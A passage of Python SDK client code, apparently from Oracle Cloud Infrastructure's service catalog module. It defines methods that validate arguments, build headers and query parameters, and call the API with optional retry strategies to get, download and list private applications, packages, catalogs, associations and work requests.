    headers = {k: v for (k, v) in six.iteritems(headers) if v is not missing and v is not None}

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    if not retry_strategy:
        # No retry strategy configured anywhere: issue the call directly.
        return self.base_client.call_api(
            resource_path=resource_path,
            method=method,
            path_params=path_params,
            header_params=headers)

    if not isinstance(retry_strategy, retry.NoneRetryStrategy):
        self.base_client.add_opc_client_retries_header(headers)
        retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
    return retry_strategy.make_retrying_call(
        self.base_client.call_api,
        resource_path=resource_path,
        method=method,
        path_params=path_params,
        header_params=headers)
def get_private_application(self, private_application_id, **kwargs):
    """
    Gets the details of the specified private application.

    :param str private_application_id: (required)
        The unique identifier for the private application.

    :param str opc_request_id: (optional)
        Unique Oracle-assigned identifier for the request, to quote when contacting Oracle
        about a particular request.

    :param obj retry_strategy: (optional)
        A retry strategy to apply to this specific operation/call, overriding any strategy set at
        the client level. Should be one of the strategies from the :py:mod:`~oci.retry` module;
        pass an instance of :py:class:`~oci.retry.NoneRetryStrategy` to explicitly disable retries.

    :return: A :class:`~oci.response.Response` object with data of type :class:`~oci.service_catalog.models.PrivateApplication`
    :rtype: :class:`~oci.response.Response`
    """
    resource_path = "/privateApplications/{privateApplicationId}"
    method = "GET"

    # Reject any keyword argument this operation does not recognize.
    allowed = ("retry_strategy", "opc_request_id")
    unknown = [name for name in six.iterkeys(kwargs) if name not in allowed]
    if unknown:
        raise ValueError(
            "get_private_application got unknown kwargs: {!r}".format(unknown))

    path_params = {"privateApplicationId": private_application_id}
    path_params = dict((k, v) for (k, v) in six.iteritems(path_params) if v is not missing)
    # Path parameters must be present and non-blank to build a valid URL.
    for name, value in six.iteritems(path_params):
        blank = isinstance(value, six.string_types) and len(value.strip()) == 0
        if value is None or blank:
            raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(name))

    headers = {
        "accept": "application/json",
        "content-type": "application/json",
        "opc-request-id": kwargs.get("opc_request_id", missing)
    }
    # Drop optional headers the caller did not supply.
    headers = {k: v for (k, v) in six.iteritems(headers) if v is not missing and v is not None}

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    if not retry_strategy:
        # No retry strategy configured anywhere: issue the call directly.
        return self.base_client.call_api(
            resource_path=resource_path,
            method=method,
            path_params=path_params,
            header_params=headers,
            response_type="PrivateApplication")

    if not isinstance(retry_strategy, retry.NoneRetryStrategy):
        self.base_client.add_opc_client_retries_header(headers)
        retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
    return retry_strategy.make_retrying_call(
        self.base_client.call_api,
        resource_path=resource_path,
        method=method,
        path_params=path_params,
        header_params=headers,
        response_type="PrivateApplication")
def get_private_application_action_download_logo(self, private_application_id, **kwargs):
    """
    Downloads the binary payload of the logo image of the private application.

    :param str private_application_id: (required)
        The unique identifier for the private application.

    :param str opc_request_id: (optional)
        Unique Oracle-assigned identifier for the request, to quote when contacting Oracle
        about a particular request.

    :param obj retry_strategy: (optional)
        A retry strategy to apply to this specific operation/call, overriding any strategy set at
        the client level. Should be one of the strategies from the :py:mod:`~oci.retry` module;
        pass an instance of :py:class:`~oci.retry.NoneRetryStrategy` to explicitly disable retries.

    :return: A :class:`~oci.response.Response` object with data of type stream
    :rtype: :class:`~oci.response.Response`
    """
    resource_path = "/privateApplications/{privateApplicationId}/actions/downloadLogo"
    method = "GET"

    # Reject any keyword argument this operation does not recognize.
    allowed = ("retry_strategy", "opc_request_id")
    unknown = [name for name in six.iterkeys(kwargs) if name not in allowed]
    if unknown:
        raise ValueError(
            "get_private_application_action_download_logo got unknown kwargs: {!r}".format(unknown))

    path_params = {"privateApplicationId": private_application_id}
    path_params = dict((k, v) for (k, v) in six.iteritems(path_params) if v is not missing)
    # Path parameters must be present and non-blank to build a valid URL.
    for name, value in six.iteritems(path_params):
        blank = isinstance(value, six.string_types) and len(value.strip()) == 0
        if value is None or blank:
            raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(name))

    headers = {
        "accept": "image/bmp, image/gif, image/jpeg, image/png, image/tiff",
        "content-type": "application/json",
        "opc-request-id": kwargs.get("opc_request_id", missing)
    }
    # Drop optional headers the caller did not supply.
    headers = {k: v for (k, v) in six.iteritems(headers) if v is not missing and v is not None}

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    if not retry_strategy:
        # No retry strategy configured anywhere: issue the call directly.
        return self.base_client.call_api(
            resource_path=resource_path,
            method=method,
            path_params=path_params,
            header_params=headers,
            response_type="stream")

    if not isinstance(retry_strategy, retry.NoneRetryStrategy):
        self.base_client.add_opc_client_retries_header(headers)
        retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
    return retry_strategy.make_retrying_call(
        self.base_client.call_api,
        resource_path=resource_path,
        method=method,
        path_params=path_params,
        header_params=headers,
        response_type="stream")
def get_private_application_package(self, private_application_package_id, **kwargs):
    """
    Gets the details of a specific package within a given private application.

    :param str private_application_package_id: (required)
        The unique identifier for the private application package.

    :param str opc_request_id: (optional)
        Unique Oracle-assigned identifier for the request, to quote when contacting Oracle
        about a particular request.

    :param obj retry_strategy: (optional)
        A retry strategy to apply to this specific operation/call, overriding any strategy set at
        the client level. Should be one of the strategies from the :py:mod:`~oci.retry` module;
        pass an instance of :py:class:`~oci.retry.NoneRetryStrategy` to explicitly disable retries.

    :return: A :class:`~oci.response.Response` object with data of type :class:`~oci.service_catalog.models.PrivateApplicationPackage`
    :rtype: :class:`~oci.response.Response`
    """
    resource_path = "/privateApplicationPackages/{privateApplicationPackageId}"
    method = "GET"

    # Reject any keyword argument this operation does not recognize.
    allowed = ("retry_strategy", "opc_request_id")
    unknown = [name for name in six.iterkeys(kwargs) if name not in allowed]
    if unknown:
        raise ValueError(
            "get_private_application_package got unknown kwargs: {!r}".format(unknown))

    path_params = {"privateApplicationPackageId": private_application_package_id}
    path_params = dict((k, v) for (k, v) in six.iteritems(path_params) if v is not missing)
    # Path parameters must be present and non-blank to build a valid URL.
    for name, value in six.iteritems(path_params):
        blank = isinstance(value, six.string_types) and len(value.strip()) == 0
        if value is None or blank:
            raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(name))

    headers = {
        "accept": "application/json",
        "content-type": "application/json",
        "opc-request-id": kwargs.get("opc_request_id", missing)
    }
    # Drop optional headers the caller did not supply.
    headers = {k: v for (k, v) in six.iteritems(headers) if v is not missing and v is not None}

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    if not retry_strategy:
        # No retry strategy configured anywhere: issue the call directly.
        return self.base_client.call_api(
            resource_path=resource_path,
            method=method,
            path_params=path_params,
            header_params=headers,
            response_type="PrivateApplicationPackage")

    if not isinstance(retry_strategy, retry.NoneRetryStrategy):
        self.base_client.add_opc_client_retries_header(headers)
        retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
    return retry_strategy.make_retrying_call(
        self.base_client.call_api,
        resource_path=resource_path,
        method=method,
        path_params=path_params,
        header_params=headers,
        response_type="PrivateApplicationPackage")
def get_private_application_package_action_download_config(self, private_application_package_id, **kwargs):
    """
    Downloads the configuration that was used to create the private application package.

    :param str private_application_package_id: (required)
        The unique identifier for the private application package.

    :param str opc_request_id: (optional)
        Unique Oracle-assigned identifier for the request, to quote when contacting Oracle
        about a particular request.

    :param obj retry_strategy: (optional)
        A retry strategy to apply to this specific operation/call, overriding any strategy set at
        the client level. Should be one of the strategies from the :py:mod:`~oci.retry` module;
        pass an instance of :py:class:`~oci.retry.NoneRetryStrategy` to explicitly disable retries.

    :return: A :class:`~oci.response.Response` object with data of type stream
    :rtype: :class:`~oci.response.Response`
    """
    resource_path = "/privateApplicationPackages/{privateApplicationPackageId}/actions/downloadConfig"
    method = "GET"

    # Reject any keyword argument this operation does not recognize.
    allowed = ("retry_strategy", "opc_request_id")
    unknown = [name for name in six.iterkeys(kwargs) if name not in allowed]
    if unknown:
        raise ValueError(
            "get_private_application_package_action_download_config got unknown kwargs: {!r}".format(unknown))

    path_params = {"privateApplicationPackageId": private_application_package_id}
    path_params = dict((k, v) for (k, v) in six.iteritems(path_params) if v is not missing)
    # Path parameters must be present and non-blank to build a valid URL.
    for name, value in six.iteritems(path_params):
        blank = isinstance(value, six.string_types) and len(value.strip()) == 0
        if value is None or blank:
            raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(name))

    headers = {
        "accept": "application/zip",
        "content-type": "application/json",
        "opc-request-id": kwargs.get("opc_request_id", missing)
    }
    # Drop optional headers the caller did not supply.
    headers = {k: v for (k, v) in six.iteritems(headers) if v is not missing and v is not None}

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    if not retry_strategy:
        # No retry strategy configured anywhere: issue the call directly.
        return self.base_client.call_api(
            resource_path=resource_path,
            method=method,
            path_params=path_params,
            header_params=headers,
            response_type="stream")

    if not isinstance(retry_strategy, retry.NoneRetryStrategy):
        self.base_client.add_opc_client_retries_header(headers)
        retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
    return retry_strategy.make_retrying_call(
        self.base_client.call_api,
        resource_path=resource_path,
        method=method,
        path_params=path_params,
        header_params=headers,
        response_type="stream")
def get_service_catalog(self, service_catalog_id, **kwargs):
    """
    Gets detailed information about the service catalog including name, compartmentId

    :param str service_catalog_id: (required)
        The unique identifier for the service catalog.
    :param str opc_request_id: (optional)
        Unique Oracle-assigned identifier for the request; quote it when
        contacting Oracle about this particular call.
    :param obj retry_strategy: (optional)
        A retry strategy for this call only, overriding any client-level
        strategy. Use one of the strategies from :py:mod:`~oci.retry`; this
        operation does not retry by default. Pass an instance of
        :py:class:`~oci.retry.NoneRetryStrategy` to explicitly disable retries.
    :return: A :class:`~oci.response.Response` object with data of type :class:`~oci.service_catalog.models.ServiceCatalog`
    :rtype: :class:`~oci.response.Response`
    """
    resource_path = "/serviceCatalogs/{serviceCatalogId}"
    method = "GET"

    # Reject keyword arguments this operation does not understand.
    allowed = ("retry_strategy", "opc_request_id")
    unknown = [name for name in six.iterkeys(kwargs) if name not in allowed]
    if unknown:
        raise ValueError(
            "get_service_catalog got unknown kwargs: {!r}".format(unknown))

    # Path template substitutions; each must be a non-blank string.
    path_params = {
        "serviceCatalogId": service_catalog_id
    }
    path_params = {key: val for (key, val) in six.iteritems(path_params) if val is not missing}
    for (key, val) in six.iteritems(path_params):
        if val is None or (isinstance(val, six.string_types) and len(val.strip()) == 0):
            raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(key))

    header_params = {
        "accept": "application/json",
        "content-type": "application/json",
        "opc-request-id": kwargs.get("opc_request_id", missing)
    }
    header_params = {key: val for (key, val) in six.iteritems(header_params) if val is not missing and val is not None}

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    # Same arguments are used for both the retried and the direct call.
    call_kwargs = dict(
        resource_path=resource_path,
        method=method,
        path_params=path_params,
        header_params=header_params,
        response_type="ServiceCatalog")

    if not retry_strategy:
        return self.base_client.call_api(**call_kwargs)

    if not isinstance(retry_strategy, retry.NoneRetryStrategy):
        self.base_client.add_opc_client_retries_header(header_params)
        retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
    return retry_strategy.make_retrying_call(self.base_client.call_api, **call_kwargs)
def get_service_catalog_association(self, service_catalog_association_id, **kwargs):
    """
    Gets detailed information about specific service catalog association.

    :param str service_catalog_association_id: (required)
        The unique identifier of the service catalog association.
    :param str opc_request_id: (optional)
        Unique Oracle-assigned identifier for the request; quote it when
        contacting Oracle about this particular call.
    :param obj retry_strategy: (optional)
        A retry strategy for this call only, overriding any client-level
        strategy. Use one of the strategies from :py:mod:`~oci.retry`; this
        operation does not retry by default. Pass an instance of
        :py:class:`~oci.retry.NoneRetryStrategy` to explicitly disable retries.
    :return: A :class:`~oci.response.Response` object with data of type :class:`~oci.service_catalog.models.ServiceCatalogAssociation`
    :rtype: :class:`~oci.response.Response`
    """
    resource_path = "/serviceCatalogAssociations/{serviceCatalogAssociationId}"
    method = "GET"

    # Reject keyword arguments this operation does not understand.
    allowed = ("retry_strategy", "opc_request_id")
    unknown = [name for name in six.iterkeys(kwargs) if name not in allowed]
    if unknown:
        raise ValueError(
            "get_service_catalog_association got unknown kwargs: {!r}".format(unknown))

    # Path template substitutions; each must be a non-blank string.
    path_params = {
        "serviceCatalogAssociationId": service_catalog_association_id
    }
    path_params = {key: val for (key, val) in six.iteritems(path_params) if val is not missing}
    for (key, val) in six.iteritems(path_params):
        if val is None or (isinstance(val, six.string_types) and len(val.strip()) == 0):
            raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(key))

    header_params = {
        "accept": "application/json",
        "content-type": "application/json",
        "opc-request-id": kwargs.get("opc_request_id", missing)
    }
    header_params = {key: val for (key, val) in six.iteritems(header_params) if val is not missing and val is not None}

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    # Same arguments are used for both the retried and the direct call.
    call_kwargs = dict(
        resource_path=resource_path,
        method=method,
        path_params=path_params,
        header_params=header_params,
        response_type="ServiceCatalogAssociation")

    if not retry_strategy:
        return self.base_client.call_api(**call_kwargs)

    if not isinstance(retry_strategy, retry.NoneRetryStrategy):
        self.base_client.add_opc_client_retries_header(header_params)
        retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
    return retry_strategy.make_retrying_call(self.base_client.call_api, **call_kwargs)
def get_work_request(self, work_request_id, **kwargs):
    """
    Gets the status of the work request with the given ID.

    :param str work_request_id: (required)
        The ID of the asynchronous request.
    :param str opc_request_id: (optional)
        Unique Oracle-assigned identifier for the request; quote it when
        contacting Oracle about this particular call.
    :param obj retry_strategy: (optional)
        A retry strategy for this call only, overriding any client-level
        strategy. Use one of the strategies from :py:mod:`~oci.retry`; this
        operation does not retry by default. Pass an instance of
        :py:class:`~oci.retry.NoneRetryStrategy` to explicitly disable retries.
    :return: A :class:`~oci.response.Response` object with data of type :class:`~oci.service_catalog.models.WorkRequest`
    :rtype: :class:`~oci.response.Response`
    """
    resource_path = "/workRequests/{workRequestId}"
    method = "GET"

    # Reject keyword arguments this operation does not understand.
    allowed = ("retry_strategy", "opc_request_id")
    unknown = [name for name in six.iterkeys(kwargs) if name not in allowed]
    if unknown:
        raise ValueError(
            "get_work_request got unknown kwargs: {!r}".format(unknown))

    # Path template substitutions; each must be a non-blank string.
    path_params = {
        "workRequestId": work_request_id
    }
    path_params = {key: val for (key, val) in six.iteritems(path_params) if val is not missing}
    for (key, val) in six.iteritems(path_params):
        if val is None or (isinstance(val, six.string_types) and len(val.strip()) == 0):
            raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(key))

    header_params = {
        "accept": "application/json",
        "content-type": "application/json",
        "opc-request-id": kwargs.get("opc_request_id", missing)
    }
    header_params = {key: val for (key, val) in six.iteritems(header_params) if val is not missing and val is not None}

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    # Same arguments are used for both the retried and the direct call.
    call_kwargs = dict(
        resource_path=resource_path,
        method=method,
        path_params=path_params,
        header_params=header_params,
        response_type="WorkRequest")

    if not retry_strategy:
        return self.base_client.call_api(**call_kwargs)

    if not isinstance(retry_strategy, retry.NoneRetryStrategy):
        self.base_client.add_opc_client_retries_header(header_params)
        retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
    return retry_strategy.make_retrying_call(self.base_client.call_api, **call_kwargs)
def list_applications(self, **kwargs):
    """
    Lists all the applications in a service catalog or a tenancy.
    If no parameter is specified, all catalogs from all compartments in
    the tenancy will be scanned for any type of content.

    :param str compartment_id: (optional)
        The unique identifier for the compartment.
    :param str service_catalog_id: (optional)
        The unique identifier for the service catalog.
    :param str entity_type: (optional)
        The type of the application in the service catalog.
    :param str opc_request_id: (optional)
        Unique Oracle-assigned identifier for the request; quote it when
        contacting Oracle about this particular call.
    :param int limit: (optional)
        How many records to return (1-1000). Defaults to 30.
    :param str page: (optional)
        The `opc-next-page` value from the previous "List" call.
    :param str display_name: (optional)
        Exact match name filter.
    :param str entity_id: (optional)
        The unique identifier of the entity associated with service catalog.
    :param list[str] publisher_id: (optional)
        Limit results to just this publisher.
    :param list[str] package_type: (optional)
        Package type filter; a resource matching any of the given types is
        returned. Allowed values are: "STACK"
    :param list[str] pricing: (optional)
        Pricing type filter; a resource matching any of the given models is
        returned. Allowed values are: "FREE", "BYOL", "PAYGO"
    :param bool is_featured: (optional)
        Show only featured resources; `false` or omitted returns everything.
    :param str sort_order: (optional)
        Either `ASC` or `DESC`; default `ASC`. Allowed values are: "ASC", "DESC"
    :param obj retry_strategy: (optional)
        A retry strategy for this call only, overriding any client-level
        strategy. This operation does not retry by default; pass an instance of
        :py:class:`~oci.retry.NoneRetryStrategy` to explicitly disable retries.
    :return: A :class:`~oci.response.Response` object with data of type :class:`~oci.service_catalog.models.ApplicationCollection`
    :rtype: :class:`~oci.response.Response`
    """
    resource_path = "/applications"
    method = "GET"

    # Reject keyword arguments this operation does not understand.
    allowed = (
        "retry_strategy", "compartment_id", "service_catalog_id",
        "entity_type", "opc_request_id", "limit", "page", "display_name",
        "entity_id", "publisher_id", "package_type", "pricing",
        "is_featured", "sort_order")
    unknown = [name for name in six.iterkeys(kwargs) if name not in allowed]
    if unknown:
        raise ValueError(
            "list_applications got unknown kwargs: {!r}".format(unknown))

    # Enumerated parameters: every supplied value must come from the
    # documented allowed set.
    if 'package_type' in kwargs:
        package_type_allowed_values = ["STACK"]
        for candidate in kwargs['package_type']:
            if candidate not in package_type_allowed_values:
                raise ValueError(
                    "Invalid value for `package_type`, must be one of {0}".format(package_type_allowed_values)
                )

    if 'pricing' in kwargs:
        pricing_allowed_values = ["FREE", "BYOL", "PAYGO"]
        for candidate in kwargs['pricing']:
            if candidate not in pricing_allowed_values:
                raise ValueError(
                    "Invalid value for `pricing`, must be one of {0}".format(pricing_allowed_values)
                )

    if 'sort_order' in kwargs:
        sort_order_allowed_values = ["ASC", "DESC"]
        if kwargs['sort_order'] not in sort_order_allowed_values:
            raise ValueError(
                "Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
            )

    query_params = {
        "compartmentId": kwargs.get("compartment_id", missing),
        "serviceCatalogId": kwargs.get("service_catalog_id", missing),
        "entityType": kwargs.get("entity_type", missing),
        "limit": kwargs.get("limit", missing),
        "page": kwargs.get("page", missing),
        "displayName": kwargs.get("display_name", missing),
        "entityId": kwargs.get("entity_id", missing),
        "publisherId": self.base_client.generate_collection_format_param(kwargs.get("publisher_id", missing), 'multi'),
        "packageType": self.base_client.generate_collection_format_param(kwargs.get("package_type", missing), 'multi'),
        "pricing": self.base_client.generate_collection_format_param(kwargs.get("pricing", missing), 'multi'),
        "isFeatured": kwargs.get("is_featured", missing),
        "sortOrder": kwargs.get("sort_order", missing)
    }
    query_params = {key: val for (key, val) in six.iteritems(query_params) if val is not missing and val is not None}

    header_params = {
        "accept": "application/json",
        "content-type": "application/json",
        "opc-request-id": kwargs.get("opc_request_id", missing)
    }
    header_params = {key: val for (key, val) in six.iteritems(header_params) if val is not missing and val is not None}

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    # Same arguments are used for both the retried and the direct call.
    call_kwargs = dict(
        resource_path=resource_path,
        method=method,
        query_params=query_params,
        header_params=header_params,
        response_type="ApplicationCollection")

    if not retry_strategy:
        return self.base_client.call_api(**call_kwargs)

    if not isinstance(retry_strategy, retry.NoneRetryStrategy):
        self.base_client.add_opc_client_retries_header(header_params)
        retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
    return retry_strategy.make_retrying_call(self.base_client.call_api, **call_kwargs)
def list_private_application_packages(self, private_application_id, **kwargs):
    """
    Lists the packages in the specified private application.

    :param str private_application_id: (required)
        The unique identifier for the private application.
    :param str private_application_package_id: (optional)
        The unique identifier for the private application package.
    :param list[str] package_type: (optional)
        Package type filter; a resource matching any of the given types is
        returned. Allowed values are: "STACK"
    :param int limit: (optional)
        How many records to return (1-1000). Defaults to 30.
    :param str page: (optional)
        The `opc-next-page` value from the previous "List" call.
    :param str opc_request_id: (optional)
        Unique Oracle-assigned identifier for the request; quote it when
        contacting Oracle about this particular call.
    :param str sort_by: (optional)
        Single sort field; `TIMECREATED` sorts descending by default.
        Allowed values are: "TIMECREATED", "VERSION"
    :param str sort_order: (optional)
        Either `ASC` or `DESC`; default `ASC`. Allowed values are: "ASC", "DESC"
    :param str display_name: (optional)
        Exact match name filter.
    :param obj retry_strategy: (optional)
        A retry strategy for this call only, overriding any client-level
        strategy. This operation does not retry by default; pass an instance of
        :py:class:`~oci.retry.NoneRetryStrategy` to explicitly disable retries.
    :return: A :class:`~oci.response.Response` object with data of type :class:`~oci.service_catalog.models.PrivateApplicationPackageCollection`
    :rtype: :class:`~oci.response.Response`
    """
    resource_path = "/privateApplicationPackages"
    method = "GET"

    # Reject keyword arguments this operation does not understand.
    allowed = (
        "retry_strategy", "private_application_package_id", "package_type",
        "limit", "page", "opc_request_id", "sort_by", "sort_order",
        "display_name")
    unknown = [name for name in six.iterkeys(kwargs) if name not in allowed]
    if unknown:
        raise ValueError(
            "list_private_application_packages got unknown kwargs: {!r}".format(unknown))

    # Enumerated parameters: every supplied value must come from the
    # documented allowed set.
    if 'package_type' in kwargs:
        package_type_allowed_values = ["STACK"]
        for candidate in kwargs['package_type']:
            if candidate not in package_type_allowed_values:
                raise ValueError(
                    "Invalid value for `package_type`, must be one of {0}".format(package_type_allowed_values)
                )

    if 'sort_by' in kwargs:
        sort_by_allowed_values = ["TIMECREATED", "VERSION"]
        if kwargs['sort_by'] not in sort_by_allowed_values:
            raise ValueError(
                "Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values)
            )

    if 'sort_order' in kwargs:
        sort_order_allowed_values = ["ASC", "DESC"]
        if kwargs['sort_order'] not in sort_order_allowed_values:
            raise ValueError(
                "Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
            )

    query_params = {
        "privateApplicationId": private_application_id,
        "privateApplicationPackageId": kwargs.get("private_application_package_id", missing),
        "packageType": self.base_client.generate_collection_format_param(kwargs.get("package_type", missing), 'multi'),
        "limit": kwargs.get("limit", missing),
        "page": kwargs.get("page", missing),
        "sortBy": kwargs.get("sort_by", missing),
        "sortOrder": kwargs.get("sort_order", missing),
        "displayName": kwargs.get("display_name", missing)
    }
    query_params = {key: val for (key, val) in six.iteritems(query_params) if val is not missing and val is not None}

    header_params = {
        "accept": "application/json",
        "content-type": "application/json",
        "opc-request-id": kwargs.get("opc_request_id", missing)
    }
    header_params = {key: val for (key, val) in six.iteritems(header_params) if val is not missing and val is not None}

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    # Same arguments are used for both the retried and the direct call.
    call_kwargs = dict(
        resource_path=resource_path,
        method=method,
        query_params=query_params,
        header_params=header_params,
        response_type="PrivateApplicationPackageCollection")

    if not retry_strategy:
        return self.base_client.call_api(**call_kwargs)

    if not isinstance(retry_strategy, retry.NoneRetryStrategy):
        self.base_client.add_opc_client_retries_header(header_params)
        retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
    return retry_strategy.make_retrying_call(self.base_client.call_api, **call_kwargs)
def list_private_applications(self, compartment_id, **kwargs):
    """
    Lists all the private applications in a given compartment.

    :param str compartment_id: (required)
        The unique identifier for the compartment.
    :param str private_application_id: (optional)
        The unique identifier for the private application.
    :param str opc_request_id: (optional)
        Unique Oracle-assigned identifier for the request; quote it when
        contacting Oracle about this particular call.
    :param int limit: (optional)
        How many records to return (1-1000). Defaults to 30.
    :param str page: (optional)
        The `opc-next-page` value from the previous "List" call.
    :param str sort_by: (optional)
        Single sort field; default is `TIMECREATED`.
        Allowed values are: "TIMECREATED", "LIFECYCLESTATE"
    :param str sort_order: (optional)
        Either `ASC` or `DESC`; default `ASC`. Allowed values are: "ASC", "DESC"
    :param str display_name: (optional)
        Exact match name filter.
    :param obj retry_strategy: (optional)
        A retry strategy for this call only, overriding any client-level
        strategy. This operation does not retry by default; pass an instance of
        :py:class:`~oci.retry.NoneRetryStrategy` to explicitly disable retries.
    :return: A :class:`~oci.response.Response` object with data of type :class:`~oci.service_catalog.models.PrivateApplicationCollection`
    :rtype: :class:`~oci.response.Response`
    """
    resource_path = "/privateApplications"
    method = "GET"

    # Reject keyword arguments this operation does not understand.
    allowed = (
        "retry_strategy", "private_application_id", "opc_request_id",
        "limit", "page", "sort_by", "sort_order", "display_name")
    unknown = [name for name in six.iterkeys(kwargs) if name not in allowed]
    if unknown:
        raise ValueError(
            "list_private_applications got unknown kwargs: {!r}".format(unknown))

    # Enumerated parameters: every supplied value must come from the
    # documented allowed set.
    if 'sort_by' in kwargs:
        sort_by_allowed_values = ["TIMECREATED", "LIFECYCLESTATE"]
        if kwargs['sort_by'] not in sort_by_allowed_values:
            raise ValueError(
                "Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values)
            )

    if 'sort_order' in kwargs:
        sort_order_allowed_values = ["ASC", "DESC"]
        if kwargs['sort_order'] not in sort_order_allowed_values:
            raise ValueError(
                "Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
            )

    query_params = {
        "compartmentId": compartment_id,
        "privateApplicationId": kwargs.get("private_application_id", missing),
        "limit": kwargs.get("limit", missing),
        "page": kwargs.get("page", missing),
        "sortBy": kwargs.get("sort_by", missing),
        "sortOrder": kwargs.get("sort_order", missing),
        "displayName": kwargs.get("display_name", missing)
    }
    query_params = {key: val for (key, val) in six.iteritems(query_params) if val is not missing and val is not None}

    header_params = {
        "accept": "application/json",
        "content-type": "application/json",
        "opc-request-id": kwargs.get("opc_request_id", missing)
    }
    header_params = {key: val for (key, val) in six.iteritems(header_params) if val is not missing and val is not None}

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    # Same arguments are used for both the retried and the direct call.
    call_kwargs = dict(
        resource_path=resource_path,
        method=method,
        query_params=query_params,
        header_params=header_params,
        response_type="PrivateApplicationCollection")

    if not retry_strategy:
        return self.base_client.call_api(**call_kwargs)

    if not isinstance(retry_strategy, retry.NoneRetryStrategy):
        self.base_client.add_opc_client_retries_header(header_params)
        retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
    return retry_strategy.make_retrying_call(self.base_client.call_api, **call_kwargs)
def list_service_catalog_associations(self, **kwargs):
    """
    Lists all the resource associations for a specific service catalog.

    :param str service_catalog_association_id: (optional)
        The unique identifier for the service catalog association.
    :param str service_catalog_id: (optional)
        The unique identifier for the service catalog.
    :param str entity_id: (optional)
        The unique identifier of the entity associated with service catalog.
    :param str entity_type: (optional)
        The type of the application in the service catalog.
    :param int limit: (optional)
        How many records to return (1-1000). Defaults to 30.
    :param str page: (optional)
        The `opc-next-page` value from the previous "List" call.
    :param str sort_order: (optional)
        Either `ASC` or `DESC`; default `ASC`. Allowed values are: "ASC", "DESC"
    :param str sort_by: (optional)
        Default is `TIMECREATED`. Allowed values are: "TIMECREATED"
    :param str opc_request_id: (optional)
        Unique Oracle-assigned identifier for the request; quote it when
        contacting Oracle about this particular call.
    :param obj retry_strategy: (optional)
        A retry strategy for this call only, overriding any client-level
        strategy. This operation does not retry by default; pass an instance of
        :py:class:`~oci.retry.NoneRetryStrategy` to explicitly disable retries.
    :return: A :class:`~oci.response.Response` object with data of type :class:`~oci.service_catalog.models.ServiceCatalogAssociationCollection`
    :rtype: :class:`~oci.response.Response`
    """
    resource_path = "/serviceCatalogAssociations"
    method = "GET"

    # Reject keyword arguments this operation does not understand.
    allowed = (
        "retry_strategy", "service_catalog_association_id",
        "service_catalog_id", "entity_id", "entity_type", "limit", "page",
        "sort_order", "sort_by", "opc_request_id")
    unknown = [name for name in six.iterkeys(kwargs) if name not in allowed]
    if unknown:
        raise ValueError(
            "list_service_catalog_associations got unknown kwargs: {!r}".format(unknown))

    # Enumerated parameters: every supplied value must come from the
    # documented allowed set.
    if 'sort_order' in kwargs:
        sort_order_allowed_values = ["ASC", "DESC"]
        if kwargs['sort_order'] not in sort_order_allowed_values:
            raise ValueError(
                "Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
            )

    if 'sort_by' in kwargs:
        sort_by_allowed_values = ["TIMECREATED"]
        if kwargs['sort_by'] not in sort_by_allowed_values:
            raise ValueError(
                "Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values)
            )

    query_params = {
        "serviceCatalogAssociationId": kwargs.get("service_catalog_association_id", missing),
        "serviceCatalogId": kwargs.get("service_catalog_id", missing),
        "entityId": kwargs.get("entity_id", missing),
        "entityType": kwargs.get("entity_type", missing),
        "limit": kwargs.get("limit", missing),
        "page": kwargs.get("page", missing),
        "sortOrder": kwargs.get("sort_order", missing),
        "sortBy": kwargs.get("sort_by", missing)
    }
    query_params = {key: val for (key, val) in six.iteritems(query_params) if val is not missing and val is not None}

    header_params = {
        "accept": "application/json",
